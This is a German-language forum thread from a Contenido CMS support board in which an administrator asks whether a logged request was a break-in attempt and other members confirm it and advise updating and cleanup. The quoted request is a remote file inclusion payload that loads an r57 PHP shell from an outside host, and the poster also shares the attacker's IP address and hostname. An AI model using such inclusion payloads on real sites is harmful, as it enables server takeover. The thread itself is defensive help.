Ist das ein Einbruchsversuch?

Gesperrt
MyAccount
Beiträge: 383
Registriert: Do 17. Jul 2003, 10:21

Ist das ein Einbruchsversuch?

Beitrag von MyAccount »

Das ist der Aufruf:

/contenido/external/frontend/contac.php?page[path][includes]=http://www.domainnichtvonmir.de/conteni ... r57rex.txt??

Ist auf einer alten 4.4.1 passiert.

Gruß MyAccount
Nach oben
MichFress
Beiträge: 750
Registriert: Mo 5. Jan 2004, 22:32
Wohnort: Bochum
Kontaktdaten:
Kontaktdaten von MichFress

Beitrag von MichFress »

zu dem Thema findest du so einiges hier im Forum.
Ein Update des Contenidos zumindest auf die aktuellste 4.4.x wäre ratsam, wa?
"Es wird keine Handlung geben, keine Geschichte mit ihrer Versprechung auf einen Anfang und ihrer Hoffnung auf ein Ende." (Andrzej Stasiuk)
Nach oben
wosch

Re: Ist das ein Einbruchsversuch?

Beitrag von wosch »

MyAccount hat geschrieben:Das ist der Aufruf:

/contenido/external/frontend/contac.php?page[path][includes]=http://www.domainnichtvonmir.de/conteni ... r57rex.txt??

Ist auf einer alten 4.4.1 passiert.

Gruß MyAccount
JA !!!

Da wurde eine php-Shell installiert oder versucht zu installieren.
Gehe davon aus das die Installation funktioniert hat und du nun einen Untermieter auf deinem Webspace beherbergst.

Was kannst du machen?

Steht hier:
http://www.contenido.de/forum/viewtopic.php?p=102073

Und natürlich den Rat von @MichFress befolgen.
Nach oben
wosch

Beitrag von wosch »

Es wäre vielleicht sinnvoll einen Beitrag dazu:
Was mache ich wenn ...
in Tipps und Tricks zu schreiben.
Eigentlich ist der Rat immer der gleiche.
Nach oben
MyAccount
Beiträge: 383
Registriert: Do 17. Jul 2003, 10:21

Beitrag von MyAccount »

Danke Junges,

hehe mein Provider war so nett, dass sofort zu checken. Naja, es ist bei dem Versuch geblieben. Also die hatten definitiv KEINEN ERFOLG. Pfui. Saubande....

HTTP_USER_AGENT: libwww-perl/5.76

REMOTE_ADDR: 217.160.216.138

REMOTE_HOST: telemed-consult.de

Da kam es übrigens her.

Trotzdem vielen lieben Dank. Ich werde die Tage ein Update fahren.
Nach oben
wosch

Beitrag von wosch »

MyAccount hat geschrieben: REMOTE_HOST: telemed-consult.de
Du solltest den Provider von telemed-consult.de informieren.
Denn wenn der Angriff von dort kam ist er in der Hand der Bande.
Und die werden dort alles mögliche anstellen und verschicken.

Dir wurde geholfen, nun helfe bitte dem Ahnungslosen.
Nach oben
MyAccount
Beiträge: 383
Registriert: Do 17. Jul 2003, 10:21

Beitrag von MyAccount »

Der Provider ist 2oder2 ;) Waren die nicht in der letzten Woche in den Schlagzeilen, weil bei denen massenhaft die Server gehakt wurden?!

Ich würde ja gerne so ehrenhaft sein, aber ich glaube dass man von denen nicht einmal jemanden erreicht, wenn man da Kunde ist, oder?! Ich werde mal versuchen den Eigentümer der Domain anzumailen.
Nach oben
Gesperrt

Zurück zu „Version 4.6“